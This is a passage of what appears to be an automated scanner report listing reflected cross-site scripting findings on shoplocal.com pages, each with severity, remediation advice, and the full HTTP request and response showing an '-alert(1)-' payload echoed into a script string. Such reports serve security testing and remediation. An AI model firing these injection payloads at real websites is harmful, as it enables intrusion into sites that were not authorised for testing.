HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:46:49 GMT Connection: close Content-Length: 118751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=133246&57c71'-alert(1)-'7dc51db5314=1&action=browselocall1&viewmode=local&referrer=&random=799122621&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&statisticrequestid=514102990&serverid=100&slhlogon=' + readSubCookie('SLHUID','UI ...[SNIP]...
1.27. http://www.shoplocal.com/flour-sugar.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/flour-sugar.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 726b9'-alert(1)-'21fe36a336b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /flour-sugar.fp?726b9'-alert(1)-'21fe36a336b=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:29 GMT Connection: close Content-Length: 96203
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=135316&726b9'-alert(1)-'21fe36a336b=1&action=browselocall2&viewmode=local&referrer=&random=1938916052&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.28. http://www.shoplocal.com/formula.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/formula.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af71d'-alert(1)-'9627fea6250 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /formula.fp?af71d'-alert(1)-'9627fea6250=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:46:37 GMT Connection: close Content-Length: 75381
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=134858&af71d'-alert(1)-'9627fea6250=1&action=browselocall2&viewmode=local&referrer=&random=1071300280&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.29. http://www.shoplocal.com/grocery.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/grocery.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63dbe'-alert(1)-'4bb11f03fce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:44:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=133251&63dbe'-alert(1)-'4bb11f03fce=1&action=browselocall1&viewmode=local&referrer=http%3a%2f%2fwww.shoplocal.com%2f%3f9cc96-alert(1)-2f1e7ce9f19%3d1&random=118341770&siteid=252&SessionID=0&pagecounter=2&detid=9940000000&statisticreques ...[SNIP]...
1.30. http://www.shoplocal.com/home-garden.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/home-garden.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1f1c'-alert(1)-'dc1825a4065 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:47:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=133257&b1f1c'-alert(1)-'dc1825a4065=1&action=browselocall1&viewmode=local&referrer=http%3a%2f%2fwww.shoplocal.com%2f%3f9cc96-alert(1)-2f1e7ce9f19%3d1&random=1385810018&siteid=252&SessionID=0&pagecounter=2&detid=9940000000&statisticreque ...[SNIP]...
1.31. http://www.shoplocal.com/juice.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/juice.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0348'-alert(1)-'950af6645bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /juice.fp?b0348'-alert(1)-'950af6645bb=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:58:02 GMT Connection: close Content-Length: 162466
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=135311&b0348'-alert(1)-'950af6645bb=1&action=browselocall2&viewmode=local&referrer=&random=880981145&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.32. http://www.shoplocal.com/liquor.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/liquor.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cf84'-alert(1)-'792e59d691e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /liquor.fp?6cf84'-alert(1)-'792e59d691e=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:53:45 GMT Connection: close Content-Length: 150852
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=134868&6cf84'-alert(1)-'792e59d691e=1&action=browselocall2&viewmode=local&referrer=&random=1808164873&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.33. http://www.shoplocal.com/muffins.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/muffins.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7453e'-alert(1)-'f73172554b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /muffins.fp?7453e'-alert(1)-'f73172554b5=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:49:06 GMT Connection: close Content-Length: 67895
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=135098&7453e'-alert(1)-'f73172554b5=1&action=browselocall2&viewmode=local&referrer=&random=1515502944&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.34. http://www.shoplocal.com/sales.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/sales.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f63dc'-alert(1)-'d323f410229 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sales.aspx?f63dc'-alert(1)-'d323f410229=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:44:48 GMT Connection: close Content-Length: 34697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http:/ ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?f63dc'-alert(1)-'d323f410229=1&action=sales&viewmode=local&referrer=&random=1597283665&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.35. http://www.shoplocal.com/shoes.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/shoes.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cfe8'-alert(1)-'b34aed9bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /shoes.fp?8cfe8'-alert(1)-'b34aed9bb=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:48:20 GMT Connection: close Content-Length: 86549
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=133256&8cfe8'-alert(1)-'b34aed9bb=1&action=browselocall1&viewmode=local&referrer=&random=1499142490&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&statisticrequestid=451745487&serverid=101&slhlogon=' + readSubCookie('SLHUID','U ...[SNIP]...
1.36. http://www.shoplocal.com/soda-pop.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/soda-pop.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d31df'-alert(1)-'e5496cbbdd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /soda-pop.fp?d31df'-alert(1)-'e5496cbbdd7=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:59:28 GMT Connection: close Content-Length: 146939
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=135306&d31df'-alert(1)-'e5496cbbdd7=1&action=browselocall2&viewmode=local&referrer=&random=2076738274&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.37. http://www.shoplocal.com/spices-herbs.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/spices-herbs.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e8eb'-alert(1)-'66c36fc968f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spices-herbs.fp?4e8eb'-alert(1)-'66c36fc968f=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:47:14 GMT Connection: close Content-Length: 163744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=135314&4e8eb'-alert(1)-'66c36fc968f=1&action=browselocall2&viewmode=local&referrer=&random=791764425&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.38. http://www.shoplocal.com/stores.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/stores.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72ea1'-alert(1)-'b33d8a552a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stores.fp?72ea1'-alert(1)-'b33d8a552a3=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:45:03 GMT Connection: close Content-Length: 70321
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?72ea1'-alert(1)-'b33d8a552a3=1&action=storehome&viewmode=local&referrer=&random=1552218582&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.39. http://www.shoplocal.com/top-deals_grocery.fp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/top-deals_grocery.fp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 641b2'-alert(1)-'876dacb4d91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /top-deals_grocery.fp?641b2'-alert(1)-'876dacb4d91=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:45:24 GMT Connection: close Content-Length: 54676
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?N=133251&641b2'-alert(1)-'876dacb4d91=1&action=TopDeals&viewmode=local&referrer=&random=1208073340&siteid=252&pagecounter=3&detid=9940000000&SessionID=0&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
1.40. http://www.shoplocal.com/topdealslanding.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/topdealslanding.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21558'-alert(1)-'410ca815546 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
